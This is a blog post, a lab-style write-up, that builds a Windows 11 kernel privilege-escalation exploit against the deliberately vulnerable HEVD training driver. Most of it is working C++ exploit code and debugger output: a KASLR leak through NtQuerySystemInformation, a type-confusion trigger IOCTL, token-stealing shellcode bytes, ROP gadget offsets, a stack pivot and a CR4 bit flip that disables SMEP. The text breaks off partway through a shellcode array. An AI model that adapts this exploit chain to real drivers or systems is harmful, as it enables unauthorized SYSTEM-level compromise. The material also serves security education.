Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

How a simple K-TypeConfusion took me 3 months long to create a exploit?

6 August 2023 at 13:10

How a simple K-TypeConfusion took me 3 months long to create a exploit? [HEVD] - Windows 11 (build 22621)

Have you ever tested something for a really long time, that it made part of your life? that’s what happen to me for the last months when a simple TypeConfusionvulnerability almost made me go crazy!

Introduction

In this blogpost, we will talk about my experience covering a simple vulnerability that for some reason was the most hard and confuse thing that i ever have seen in a context of Kernel Exploitaiton.

We will cover about the follow topics:

  • TypeConfusion: We will discuss how this vulnerability impact in windows kernel, and as a researcher how we can manipulate and implement an exploit from User-Landin order to get Privileged Access on the operation system.
  • ROPchain: Method to make RIPregister jump through windows kernel addresses, in order to execute code. With this technique, we can actually manipulate the order of execution of our Stack, and thenceforth get access into the User-Land Shellcode.
  • Kernel ASLR Bypass: Way to Leakkernel memory addresses, and with the correct base address, we’re able to calculatethe memory region which we want to use posteriorly.
  • Supervisor Mode Execution Prevention (SMEP): Basically a mechanism that block all execution from user-land addresses, if it is enabled in operation system, you can’t JMP/CALLinto User-Land, so you can’t simply direct execute your shellcode. This protection come since Windows 8.0 (32/64 bits) version.
  • Kernel Memory Managment: Important informations about how Kernel interprets memory, including: Memory Paging, Segmentations,Data Transfer, etc. Also, a description of how memory uses his data during Operation System Layout.
  • Stack Manipulation: Stack is the most notorious thing that you will see in this blogpost, all my research lies on it, and after reboot myVM million times, i actually can understand a little bit some concepts that you must consider when writing a Stack Based exploit.

VM Setup

OS Name:                   Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys

Tips for Kernel Exploitation coding

Default windows functions most of the time can delay a exploitation development, because most of these functions should have “protected values” with a view to preveting misuse from attackers or people who want to modify/manipulateinternal values. According many C/C++scripts, you can find a import as follows:

#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>

When a inclusion of winternl.h file is made, default values of “innumerous” functions are overwritten with the values defined on structson the library.

// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>

The problem is, when you manipulating and exploiting functions from User-Land like NtQuerySystemInformationin “recent” windows versions, these defined values are “different”, blocking and preveting the use of it functions which can have some ability to leak kernel base addresses, consequently delaying our exploitation phase. So, it’s import to make sure that a code is crafted by ignoring winternl.h and posteriorly by utilizing manually structs definitions as example below:

#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>

#define QWORD uint64_t

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

INT64 GetKernelBase() {
// Leak NTDLL.sys base address in order to KASLR bypass
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}

With this technique, now we’re able to use all correct structsvalues without any troubles.

TypeConfusion vulnerability

Utilizing IDA Reverse Engineering Tool, we can clearly see the correct IOCTLwhich execute our vulnerable function.

0x222023 IOCTL to execute our TypeConfusionIoctlHandler

After reversing TriggerTypeConfusion, we have the follow code:

// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}

As you can see, the function is expecting two values from a user-controlled struct named _KERNEL_TYPE_CONFUSION_OBJECT, this struct contains (ObjectID, ObjectType)as parameters, and after parse these objects, it utilizes TypeConfusionObjectInitializerwith our objects. The vulnerable code follows as bellow:

__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}

The vulnerability in the code above is implict behind the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectTypewhich pointer to an user-controlled address.

Exploit Initialization

Knowing about our vulnerability, now we’ll get focused into exploit phases.

First of all, we craft our code in order to communicate to our HEVDdriver IRPutilizing previously got IOCTL -> 0x22202, and after that send our malicious buffer.

<...snip...>
// ---> Malicious Struct <---
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};

HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
exploit();
return 0;
}

Then after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECTshould be like this.

0xdeadbeefdeadbeef address is our callback for the moment
[CALL]ing 0xdeadbeefdeadbeef

Now we can cleary understand where exactly this vulnerability lies. The next step should be to JMP into our user-controlled buffer containing some shellcode that can escalate SYSTEM PRIVILEGES, the issue with this idea lies behind a protection mechanism called SMEP. Supervisor Mode Execution Prevention, a.k.a (SMEP).

Supervisor Mode Execution Prevention (SMEP)

The main idea behind SMEPprotection is to preveting CALL/JMP into user-landaddresses. If SMEPkernel bitis set to [1], it provides a security mechanism that protectmemory pages from user attacks.

According to Core Security,

SMEP: Supervisor Mode Execution Prevention allows pages to
be protected from
supervisor-mode instruction fetches. If
SMEP = 1, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible in
user mode
- Detects RING-0 code running in USER SPACE
- Introduced at
Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since
Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially
"Local Privilege Escalation” exploits
must now consider this feature.

Then let’s see in a pratical test if it is actually working properly.

<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>

After exploit execution we got something like this:

SMEP seems to be working properly

The BugCheckanalysis should be similar as a follows:

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>

As we can see, SMEPprotection looks working right, the follow steps will cover how do we can manipulate our addresses in order to enable our shellcode buffer to be executed by processor.

Returned-Oriented-Programming against SMEP

Returned-Oriented-Programminga.k.a (ROP), is technique that allows any attacker to manipulate the instruction pointers and returned addresses in the current stack, with this type of attack, we can actually perform a programming assembly only with execution between address to address.

As CTF101 mentioned:

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwritesaved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.

The main idea for our exploit lies behind the utilization of a ROP chain with a view to achieve arbitrary code execution. But how?

x64 CR4 register

As part of a Control Registers, CR4register basically holds a bit value that can changes between Operation Systems.

When SMEPis implemented, a default value is used in the current OS to check if SMEP still enabled, and with this information kernel can knows if through his execution, should be possible or not to CALL/JMPinto user-land addresses.

As Wikipedia says:

A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.

In my Operation System Build Windows 11 22621we can cleary see this register value in WinDBG:

CR4 value before ROP Chain

At now, the main idea is about to flipthe correct bit, in order to neutralize SMEP execution, and after that JMPinto attacker shellcode.

SMEP turning off through bit flip: 001[1]0101 -> 001[0]0101

Now, with this in mind, we need get back into our exploit source-code, and craft our ROP chainto achieve our goal. The question is, how?

At now, we know that we need change CR4value and a ROP chaincan help us, also we actually need at first to bypass Kernel ASLRdue the randomization between addresses in this land. The follow steps we’ll cover how to get the correct gadgetsto follow attacks.

Virtualization-based security (VBS)

With CR4register manipulation through ROP chainattacks, it’s important to notice that when a miscalculation is done by an attacker in the bit change exploit phase,if Virtualization-based securitybit is enabled, system catch exception and crashes after a change attempt of CR4 register value.

According to Microsoft:

Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEPfield, are blocked instantly.

If for some reason, you see an error as below, it’s a probably miscalculation of a the value which should be placed into CR4register.

<...snip...>
// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>

WinDBG output:

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.

Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409

KASLR Bypass with NtQuerySystemInformation

NtQuerySystemInformationAs mentioned before, is a function that if configured correctly can leak kernel lib base addresses once perform system query operations. As return of these queries, we can actually leak memory from user-land.

As mentioned by TrustedWave:

The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscall IDs.
<…snip…>
The function basically retrieves specific information from the environment and its structure is very simple
<…snip…>´
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.

So, now we have a question, if we can leakaddresses and calculate the correct offset of the base of these addresses to our gadget, how can we search in memory for these ones?

The solution is simple as follows:

1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt

With the file ROP.txt, we have addresses but we’re still “unable” to get the correct ones to implement a valid calculation.

Ntdllfor exemple, utilizes addresses from his module as “buffers” sometimes, and the data can point for another invalid one. At kernel level, functions “changes”, and between all these “changes” you will never hit the correct offset through a simple .writememdump.

The biggest issue lies behind when a .writemem is used, it dumps the start and end of a defined module, but it automatically don’t align correctly the offset of functions. It happens due module segmentsand malleable data which can change time by time for the properly OS work . For example, if we search for opcodesutilizing WinDBGcommand line, there’s a static buffer address which returns exatcly the opcodes that we send.

WinDBG opcode searching

The addresses above seems to be valid, and they are identical due our opcodes, the problem is that 0xffffff80051ef8500 is a buffer and it returns everything we put into WinDBGsearch function [s command]. So, no matter how you changesopcode, it always returns back in a buffer.

WinDBG opcode searching

Ok, now let’s say that ROPGadget.py return as the follow output:

--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret

If we try to check if that opcodesare the same in our current VM, we’ll notice something like this:

Inspecting 0xfffff800516a6ac4 address

As you can see, the offset from .writememis invalid, meaning that something went wrong. A simple fix for this issue is by looking into our ROPGadgetsand see what assembly code that we need, and thenceforth we convert this code into opcode, so with that we can freely search into current valid memory the addresses to start our ROP chain.

4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0

Now we know that ntdll base address 0xffffff8005120000 + 0x00000000002ce4c0will result into nt!ExfReleasePushLock+0x20function.

Stack Pivoting & ROP chain

With previously idea of what exatcly means aROP chain, now it’s important to know what gadget do we need to change CR4register value utlizing only kernel addresses.

STACK PIVOTING:
mov esp, 0x48000000

ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one

// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we moves 0x48000000 address to our ESP/RSP register
we actually can manipulated the range of addresses that we'll [CALL/JMP].

Now knowing about ourROP chain logic, we need to discuss about Stack Pivoting technique.

Stack pivoting basically means the changes of current Kernel stack into a user-controlled Fake Stack, this modification can be possible by changing RSP register value. When we changes RSP value to a user-controlled stack, we can actually manipulate it execution through a ROP chain, once we can do a programming returning into kernel addresses.

Getting back into the code, we implement our attacker Fake Stack.

<...snip...>
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RDX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RDX;
std::cout << "[+] MOV_CR4_RDX: 0x" << std::hex << POP_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
